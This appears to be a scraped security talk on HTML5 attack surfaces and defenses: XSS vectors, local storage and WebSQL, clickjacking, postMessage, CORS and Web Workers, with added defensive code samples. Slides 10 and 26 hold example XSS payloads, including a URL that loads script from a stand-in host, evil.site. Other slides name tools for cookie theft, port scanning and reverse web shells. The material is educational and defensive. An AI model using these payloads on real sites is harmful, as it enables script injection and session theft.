Talk about html5 security
3,191 views

Published in: Education, Technology
  • http://www.codesec.info/talk-about-html5-security.html

  1. youstar@insight-labs
  2.
     • Introduction to HTML5
     • HTML5 threat model
     • Vulnerabilities & Defense
     • Tools
     • Reference
  3. History
     • HTML 1.0: 1993.6, not a standard
     • HTML 2.0: 1995.11, RFC 1866
     • HTML 3.2: 1996.1.14, W3C Recommended Standard
     • HTML 4.0: 1997.12.18, W3C Recommended Standard
     • HTML 4.01: 1999.12.24, W3C Recommended Standard
     • XHTML: 2000.1.20, W3C Recommended Standard
     • HTML5: 2008 first draft standard; 2012 W3C Candidate Recommendation
  4. Features: the three aspects of HTML5
     • Content: HTML
       ▪ New tags and attributes
     • Presentation of content: CSS
     • Interaction with content: JavaScript
       ▪ New APIs: Drag, LocalStorage, WebWorkers, etc.
  5. Features
  6.
     • XSS abuse with tags and attributes
     • Hiding URL code
     • Stealing from the storage
     • Injecting and exploiting WebSQL
     • ClickJacking and CookieJacking
     • Cross-origin requests and postMessage
     • Client-side file includes
     • Botnets and widgets
  7. In:
     • New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>
     • New attributes for tags: autocomplete, autofocus, pattern (yes, regex) for input
     • New media events
     • New <canvas> tag for 2D rendering
     • New form controls for date and time
     • Geolocation
     • New selectors
     • Client-side storage including localStorage, sessionStorage, and WebSQL
     Out:
     • Presentation elements such as <font>, <center>
     • Presentation attributes including align, border
     • <frame>, <frameset>
     • <applet>
     • Old special effects: <marquee>, <bgsound>
     • <noscript>
  8. Attack:
     • New XSS vectors
     • Bypass black-list filters
     Defense:
     • Add the new tags to the black-list
     • Change the regex
  9. DOM
     • window.history.back();
     • window.history.forward();
     • window.history.go();
     HTML5
     • history.pushState()
       ▪ history.pushState(stateObject, title, URL);
     • history.replaceState()
       ▪ Same as pushState, but modifies the current history entry.
  10. http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},"",location.href.split("?").shift());document.write(1)</script>
      After pushState the address bar shows only http://127.0.0.1/html5/poc/history/xsspoc.php
  11. Type
      • LocalStorage: for long-term storage
      • SessionStorage: for the session (lasts until the browser is closed)
      Differences
      • Cookies: 4 KB
      • LocalStorage / SessionStorage: depends on the browser (usually 5 MB)
      Support
      • Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
  12. Functions
      • (localStorage | sessionStorage).setItem()
      • (localStorage | sessionStorage).getItem()
      • (localStorage | sessionStorage).removeItem()
      • (localStorage | sessionStorage).clear()
  13. Attack
      • Get the data from the storage (cookie, password, etc.)
      • Store your XSS shellcode
      • No path restriction
      Defense
      • Don't store sensitive data in local storage
      • Don't use local storage for session identifiers
      • Stick with cookies and use the HttpOnly and Secure flags
  14. Database Storage
      • The same as Google Gears
      Operate
      • db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSize);
      • db.transaction(function (tx) { tx.executeSql("YOUR SQL STATEMENT HERE"); });
      Type
      • SQLite (supported by WebKit)
  15. Attack
      • Store shellcode
      • SQL injection
      Defense
      • Be strict with SQL operations
      • Encode the SQL result before display
      • Don't store sensitive data
  16. Store shellcode
  17. SQL Injection
      • Use sqlite_master
        ▪ SELECT name FROM sqlite_master WHERE type='table'
        ▪ SELECT sql FROM sqlite_master WHERE name='table_name'
        ▪ SELECT sqlite_version()
      • Select with ?
        ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False
        ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
  18. Drag and drop basics
      • Drag data
      • The drag feedback image
      • Drag effects
      Drag events:
      • dragstart, dragenter, dragover, dragleave, drag, drop, dragend
  19. ClickJacking: XSS + Drag
  20. CookieJacking
      • Uses several techniques to steal the user's local cookies
      Technology
      • How to read the local file: iframe + file://
      • How to detect the state of cookies: Clickjacking
      • How to send cookies: SMB
  21. Defense
      • Use iframe with sandbox
      • if (top !== window) top.location = window.location.href;
      • if (top != self) top.location.href = self.location.href;
  22. postMessage
      • Send
        ▪ otherWindow.postMessage(message, targetOrigin);
      • Receive
        ▪ window.addEventListener("message", receiveMessage, false);
          function receiveMessage(event) {
            if (event.origin !== "http://example.org:8080") return;
            // ...
          }
  23. Defense
      • Check the postMessage origin
      • Don't use innerHTML
        ▪ Element.innerHTML = e.data; // danger
        ▪ Element.textContent = e.data; // safe
      • Don't use eval to deal with the message
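As an added example (not part of the slides), a receiver that applies both defenses from slides 22 and 23 together: an exact origin check against an allow-list, and textContent instead of innerHTML for the payload. The element and event objects are plain stand-ins for DOM objects so the logic runs outside a browser; the allowed origin is an assumption.

```javascript
// Added example, not from the slides: postMessage receiver with an origin
// allow-list and text-only rendering. Stand-in objects replace the DOM.

const ALLOWED_ORIGINS = new Set(["https://app.example.org:8080"]); // constructed

// Build a "message" handler bound to an output element. Returns true when a
// message was accepted and rendered, false when it was rejected.
function makeReceiver(allowedOrigins, outputEl) {
  return function receiveMessage(event) {
    // Exact comparison of the whole origin; prefix or substring checks are
    // how this defense usually fails (e.g. "https://app.example.org.evil.net").
    if (!allowedOrigins.has(event.origin)) return false;
    // Only accept string payloads; never eval() structured data from a peer.
    if (typeof event.data !== "string") return false;
    // textContent stores plain text, so markup in the payload stays inert.
    outputEl.textContent = event.data;
    return true;
  };
}

// Sender side (slide 22): always name the target origin. "*" would deliver the
// message to whatever document currently occupies otherWindow.
function sendTo(otherWindow, message, targetOrigin) {
  if (targetOrigin === "*") throw new Error("refusing wildcard targetOrigin");
  otherWindow.postMessage(message, targetOrigin);
}

// Demo with a fake element and constructed events.
function demo() {
  const el = { textContent: "" };
  const receive = makeReceiver(ALLOWED_ORIGINS, el);
  const results = {
    trusted: receive({ origin: "https://app.example.org:8080", data: "hello" }),
    lookalike: receive({ origin: "https://app.example.org:8080.evil.net",
                         data: "<img src=x onerror=alert(1)>" }),
    nonString: receive({ origin: "https://app.example.org:8080", data: { cmd: "eval" } }),
  };
  return { results, rendered: el.textContent };
}
```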
  24. Cross-Origin Resource Sharing
      ▪ Originally Ajax calls were subject to the Same Origin Policy
      ▪ Site A cannot make XMLHttpRequests to Site B
      ▪ HTML5 makes it possible to make these cross-domain calls
      ▪ Site A -> Site B (the response must include a header)
      ▪ Access-Control-Allow-Origin: Site A (must)
      ▪ Access-Control-Allow-Credentials: true | false
      ▪ Access-Control-Expose-Headers:
      ▪ etc.
  25. Defense
      • Don't set this: Access-Control-Allow-Origin: *
        ▪ (like Flash crossdomain.xml)
      • Prevent DDoS
        ▪ if (origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); ... // process request }
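The server-side decision from slide 25 written out, as an added example that is not from the slides: the request's Origin is echoed only when it is on an explicit allow-list, "*" is never emitted, and Allow-Credentials is sent only next to that specific origin. It is framework-agnostic; the allow-list and the response object shape (writeHead/end, as Node's http.ServerResponse provides) are assumptions.

```javascript
// Added example, not from the slides: CORS origin allow-list for a server.

const ALLOWED_ORIGINS = new Set(["https://site-a.example"]); // constructed

// Return the CORS headers for a request Origin, or {} when the origin is
// missing or unknown, so the browser refuses to expose the response.
function corsHeadersFor(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,      // exact value, never "*"
    "Access-Control-Allow-Credentials": "true", // only valid with a fixed origin
    "Access-Control-Allow-Methods": "GET",
    "Vary": "Origin",                           // caches must not mix origins
  };
}

// Apply the decision: preflights (OPTIONS) get the headers and no body,
// real requests get the headers plus the resource, unknown origins get no
// CORS headers at all (the browser then blocks the response for the page).
function handleCors(req, res) {
  const headers = corsHeadersFor(req.headers.origin);
  if (req.method === "OPTIONS") {
    res.writeHead(Object.keys(headers).length ? 204 : 403, headers);
    res.end();
    return;
  }
  res.writeHead(200, { ...headers, "Content-Type": "application/json" });
  res.end(JSON.stringify({ ok: true }));
}
```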
  26. Code like this:
      <html><body><script>
      x = new XMLHttpRequest();
      x.open("GET", location.hash.substring(1));
      x.onreadystatechange = function () {
        if (x.readyState == 4) { document.getElementById("main").innerHTML = x.responseText; }
      };
      x.send();
      </script><div id="main"></div></body></html>
      POC
      • Introducing Cross Origin Requests
      • http://example.com/#http://evil.site/payload.php
      • Contents of 'payload.php' will be included as HTML within <div id="main"></div>
      • New type of XSS!!
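A guard for the pattern on slide 26, added here and not part of the slides: before any request is made, the value after "#" is resolved against the page's own origin and accepted only when it stays on that origin and names a known fragment path, so "#http://evil.site/payload.php" and protocol-relative forms are refused. PAGE_ORIGIN and ALLOWED_PATHS are constructed for the demo; the fetched body should still be written with textContent rather than innerHTML.

```javascript
// Added example, not from the slides: validate a location.hash fetch target.

const PAGE_ORIGIN = "https://example.com";                       // constructed
const ALLOWED_PATHS = new Set(["/fragments/news.html", "/fragments/help.html"]);

// Returns the absolute URL to fetch, or null when the fragment is rejected.
function resolveFragmentTarget(hash, pageOrigin = PAGE_ORIGIN) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  if (!raw) return null;
  let url;
  try {
    // Relative paths resolve against the page; absolute and protocol-relative
    // values ("http://evil.site/...", "//evil.site/...") keep their own origin.
    url = new URL(raw, pageOrigin);
  } catch (e) {
    return null;                                   // unparsable fragment
  }
  if (url.origin !== pageOrigin) return null;      // cross-origin, javascript:, data:
  if (!ALLOWED_PATHS.has(url.pathname)) return null; // not a known fragment
  return url.href;
}
```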
  27. Web Workers
      • Running scripts in the background independently
      • Very simple:
        var w = new Worker("some_script.js");
        w.onmessage = function (e) { /* do something */ };
        w.terminate();
      • Access
        ▪ XHR, navigator object, application cache, spawn other workers!
      • Can't access
        ▪ DOM, window, document objects
  28. Attack
      • Botnet
        ▪ Application-level DDoS attacks
        ▪ Email spam
        ▪ Distributed password cracking
      • Network scanning
      • Guessing the user's private IP address
        ▪ Identify the user's subnet
        ▪ Identify the IP address
  29. COR + XSS + Workers = Shell of the Future
  30. HTML5CSdump
      • Enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name
      JS-Recon
      • Port scans
      • Network scans
      • Detecting private IP address
  31. Imposter
      • Steal cookies
      • Set cookies
      • Steal Local Shared Objects
      • Steal stored passwords from Firefox
      • etc.
      Shell of the Future
      • Reverse web shell handler
      • Bypass anti-session-hijacking measures
  32. Ravan
      • JavaScript-based distributed computing system
      • Hashing algorithms
        ▪ MD5
        ▪ SHA1
        ▪ SHA256
        ▪ SHA512
  33.
      • New security threats brought by HTML5: xisigr
      • Attacking with HTML5: lavakumark
      • Abusing HTML5: Ming Chow
      • HTML5 Web Security: Thomas Röthlisberger
      • Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
      • Cookiejacking: Rosario Valotta
      • http://heideri.ch/jso/#html5
      • http://www.wooyun.org/bugs/wooyun-2011-02351
      • http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
      • http://www.html5test.com
  34.
      • http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
      • http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
      • http://code.google.com/intl/zh-CN/apis/gears/api_database.html
      • http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
      • http://www.w3.org/TR/access-control/
      • http://m-austin.com/blog/?p=19
      • https://developer.mozilla.org/en/
      • http://www.w3.org/TR/cors/
      • http://www.andlabs.org/tools/ravan.html
      • http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
  35. Contact Me
      • email: youstar@foxmail.com
      • Site: www.codesec.info, www.insight-labs.org
